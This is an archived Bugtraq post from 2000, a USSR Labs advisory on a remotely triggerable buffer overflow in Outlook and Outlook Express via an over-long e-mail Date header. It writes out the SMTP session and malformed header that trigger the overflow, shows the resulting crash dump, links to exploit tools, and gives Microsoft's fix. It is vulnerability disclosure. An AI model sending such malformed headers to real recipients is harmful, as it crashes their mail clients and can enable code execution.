Bugtraq mailing list archives
Remotely Exploitable Buffer Overflow in Outlook "Malformed E-mail MIME Header" Vulnerability
From: labs () USSRBACK COM (Ussr Labs)
Date: Wed, 19 Jul 2000 05:21:40 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Remotely Exploitable Buffer Overflow in Outlook "Malformed E-mail MIME Header" Vulnerability "the new generation of virus is here. by sending a malformed e-mail you can run arbitrary code on the remote machine." USSR Advisory Code: USSR-2000050 Release Date: July 13, 2000 Systems Affected: Microsoft Outlook Express 4.0 Microsoft Outlook Express 4.01 Microsoft Outlook Express 5.0 Microsoft Outlook Express 5.01 Microsoft Outlook 97 Microsoft Outlook 98 Microsoft Outlook 2000 THE PROBLEM: The Ussr Labs team has recently discovered an exploitable buffer overflow in all versions of Outlook. The vulnerability could enable a malicious sender of an e-mail message with a malformed header to cause and exploit a buffer overrun on a user's machine. The buffer overrun could crash Outlook Express, Outlook e-mail client, or cause arbitrary code to run on the user's machine. The danger in this vulnerability is that the buffer overrun would occur even if the user does not open or preview the e-mail message. This is because the buffer overrun occurs and the vulnerability is triggered during the process of downloading the e-mail message from server to client. It is unlikely that a user will be able to delete the malicious message from the client. Instead, the user should request that the e-mail server administrator delete the message from the mail server. A nice little feature about this buffer overflow is that the mail is not deleted from the server, and next time outlook is loaded, it will try to download the mail, causing it to crash again. DEMONSTRATION: To test this vulnerability I telneted to an SMTP server and sent the following to myself: HELO MAIL FROM: BILLGATES () MICROSOFT COM RCPT TO: MY () EMAIL COM DATA Date: Thu,13 Jun 2000 12:33:16 +1111111111111111111111111111111111111111111111111111111111111 (dot here) QUIT After the remote host closed the connection and sent mail to the appropriate address, upon receipt of the mail the following fault was generated by Outlook: - ---------------------------------------------------------------------- - - OUTLOOK caused an invalid page fault in module <unknown> at 00de:00aedc5a. Registers: EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286 EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131 ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57 EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000 Bytes at CS:EIP: Stack dump: 0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054 00000054 0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131 31313131 - ---------------------------------------------------------------------- - - SPECIAL NOTE: We take no responsibility for this code. It is for educational purposes only. EXPLOIT: Malformed Email Spawner. (works better with qmail) This code will create and send an e-mail message, that when downloaded by outlook, will open http://www.ussrback.com Unix/Linux Perl Version: http://www.ussrback.com/outoutlook.pl Windows Console Version: http://www.ussrback.com/outoutlook.exe Windows Console Version Source: http://www.ussrback.com/outoutlook.zip Vendor Status: Informed!, Contacted!. More Information: http://www.microsoft.com/technet/security/bulletin/ms00-043.asp Microsoft Security Bulletin MS00-045: Frequently Asked Questions, http://www.microsoft.com/technet/security/bulletin/fq00-043.asp Fix: The vulnerability can be eliminated by a default installation of either of the following upgrades: Internet Explorer 5.01 Service Pack 1, http://www.microsoft.com/Windows/ie/download/ie501sp1.htm Internet Explorer 5.5 on any system except Windows 2000, http://www.microsoft.com/windows/ie/download/ie55.htm Vendor Url: http://www.microsoft.com Program Url: http://www.microsoft.com/office/outlook/ Related Links: Underground Security Systems Research: http://www.ussrback.com CrunchSp Product: http://www.crunchsp.com Greetings: Attrition, w00w00, beavuh, Rhino9, Synnergy.net, SecurityFocus.com, ADM, HNC, #Synnergy (efnet),#hackphreak (efnet), Technotronic, dethy, thrill, RFP and Wiretrip. Copyright (c) 1999-2000 Underground Security Systems Research. Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without explicit consent of Ussr. If you wish to reprint whole or any part of this alert in any other medium excluding electronic medium, please e-mail labs () ussrback com for permission. Disclaimer: The information within this paper may change without notice. We may not be held responsible for the use and/or potential effects of these programs or advisories. Use them and read them at your own risk or not at all. You solely are responsible for this judgement. Feedback: Please send suggestions, updates, and comments to: Underground Security Systems Research mail:labs () ussrback com http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOXVkQq3JcbWNj6DDEQIP7gCg2sP4aySOiygQ8TQIUIUTGlyNAwkAnAxS aGP1fEcH8zJMlAkPDJjoVVhu =2zaQ -----END PGP SIGNATURE-----
Current thread:
- S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4, (continued)
- S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4 Lluis Mora (Jul 17)
- [COVERT-2000-07] LISTSERV Web Archive Remote Overflow COVERT Labs (Jul 17)
- [RHSA-2000:043-02] Updated package for nfs-utils available bugzilla () REDHAT COM (Jul 17)
- Trustix Security Advisory - nfs-utils Oystein Viggen (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Andrea Costantino (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Matt Wilson (Jul 18)
- Update on TooRcon Computer Security Expo Ben (Jul 18)
- "Best Practices for Secure Web Development" whitepaper Razvan Peteanu (Jul 18)
- [Security Announce] MDKSA-2000:021 nfs-utils update Linux Mandrake Security Team (Jul 18)
- Microsoft Security Bulletin (MS00-043) Microsoft Product Security (Jul 19)
- Remotely Exploitable Buffer Overflow in Outlook "Malformed E-mail MIME Header" Vulnerability Ussr Labs (Jul 19)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Joe Laffey (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Kurt Seifried (Jul 18)
- @stake Security Advisory: NetZero Password Algorithm Brian Carrier (Jul 18)
- Re: @stake Security Advisory: NetZero Password Algorithm Dan Kaminsky (Jul 18)
- Re: @stake Security Advisory: NetZero Password Algorithm Damien Miller (Jul 20)
- Multiple bugs in Alibaba 2.0 Prizm (Jul 18)
- Buffer Overflow in MS Outlook Email Clients Aaron Drew (Jul 19)
- Re: Buffer Overflow in MS Outlook Email Clients bednar () RAK ISTERNET SK (Jul 18)
- Re: Buffer Overflow in MS Outlook Email Clients chris.paget () ANALYSYS COM (Jul 19)
- Re: Buffer Overflow in MS Outlook Email Clients Elias Levy (Jul 21)